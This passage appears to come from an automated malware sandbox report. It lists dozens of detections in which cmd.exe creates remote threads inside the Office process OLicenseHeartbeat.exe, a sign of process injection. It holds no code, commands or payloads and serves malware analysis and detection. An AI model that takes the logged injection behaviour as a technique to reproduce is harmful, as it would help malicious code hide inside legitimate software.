            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36E0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3720000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3760000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3790000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3910000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3950000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3990000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 39D0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3A00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3B80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3BC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C30000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DB0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DF0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E30000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E60000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3FE0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4020000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4060000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40A0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40D0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4250000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4290000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 42C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4440000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4480000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 44C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4500000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4540000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4580000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 45C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4600000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4640000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4680000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 46C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4700000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4740000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4780000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 47C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4800000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4840000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4880000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 48C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4900000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4940000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4980000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 49C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4AC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4BC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4CC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4DC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4EC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F00000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F40000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F80000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4FC0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5000000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5040000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5080000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 50C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5100000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5140000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5180000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 51C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5200000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5240000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5280000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 52C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5300000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5340000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5380000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 53C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5400000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5440000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5480000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 54C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5500000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5540000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5580000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 55C0000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5600000
            Source: C:\Windows\SysWOW64\cmd.exe | Thread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5640000
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5680000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 56C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5700000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5740000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5780000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 57C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5800000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5840000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5880000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 58C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5900000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5940000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5980000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 59C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5A80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5AF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5C70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5CF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5D70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5DF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5E70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5EF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5F70000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6030000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6070000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 60F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6130000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6170000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 61F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6230000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6270000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 62F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6330000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6370000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 63F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6430000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6470000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 64F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6530000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6570000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65B0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 65F0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6630000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6660000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 67E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6820000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6860000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 68E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6920000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6960000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 69E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A20000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6A60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6AE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 6B20000Jump to behavior
